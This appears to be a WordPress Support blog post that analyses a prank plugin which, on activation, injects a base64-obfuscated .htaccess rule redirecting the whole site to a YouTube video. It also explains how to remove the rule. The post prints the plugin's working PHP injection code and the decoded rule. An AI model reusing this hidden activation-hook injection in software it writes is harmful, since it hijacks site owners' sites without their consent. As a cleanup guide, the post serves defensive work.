Welcome to the official blog for the WordPress Support team.
Need help with a WordPress issue? You can find help with your WordPress problem by posting in the support forums or asking on the #wordpress IRC channel.
Want to get involved?
Answering a question in the support forums or on IRC is one of the easiest ways to get started. Everyone knows the answer to something!
We have a detailed handbook to help contributors learn how to work with the forums and IRC.
Weekly Meetings
As well as discussing support issues here on the blog, we use Slack for group communication.
Our weekly meeting is held every Thursday 17:00 UTC, with the first meeting of the month being office hours, and the next will be at Thursday, 17:00 UTC(your time zone) in #forums on SlackSlackSlack is a Collaborative Group Chat Platform https://slack.com/. The WordPress community has its own Slack Channel at https://make.wordpress.org/chat/..
Install and activate the attached pluginPluginA plugin is a piece of software containing a group of functions that can be added to a WordPress website. They can extend functionality or add new features to your WordPress websites. WordPress plugins are written in the PHP programming language and integrate seamlessly with WordPress. These can be free in the WordPress.org Plugin Directory https://wordpress.org/plugins/ or can be cost-based plugin from a third-party.
The first step is, of course, to delete this plugin. However even in doing so, you still can’t get back to your site.
Whenever this happens, it’s likely that the plugin left something on your site. Redirects that are instantaneous are usually caused by something injected into your .htaccess or index.php file. In this case, the .htaccess has the following:
# BEGIN I Love DC
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^.*$ http://www.youtube.com/watch?v=oHg5SJYRHA0 [L,R=301]
</IfModule>
# END I Love DC
(If you are running WordPress out of it’s own directory, the .htaccess will be in that folder. So this site is in /home/user/domain.com/blog/ and the .htaccess would be there).
Once you delete that section from your .htaccess, the ‘hack’ goes away.
The code of the plugin itself is very simple. There is no actually useful code in the plugin at all, and all it does is utilize insert_with_markers(), which is (legitimately) used by WP to add .htaccess rules.
class ILoveDCPlugin {
static function install() {
$htaccess = trailingslashit(ABSPATH).'.htaccess';
$data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg
IFJld3JpdGVCYXNlIC8KICAgICAgICBSZXdyaXRlUnVsZSBeLiokIGh0dHA6Ly93d3cueW91dHVi
ZS5jb20vd2F0Y2g/dj1vSGc1U0pZUkhBMCBbTCxSPTMwMV0KPC9JZk1vZHVsZT4K');
insert_with_markers($htaccess, 'I Love DC', explode( "\n",$data));
}
}
register_activation_hook( __FILE__, array('ILoveDCPlugin', 'install') );
By using base64_decode(), you know that things are almost always a little nefarious. You can decode the base64 string through Coderstoolbox to decrypt it, and it translates directly to the .htaccess rules we saw.
Long term, the fix is to delete the plugin and never ever use it again.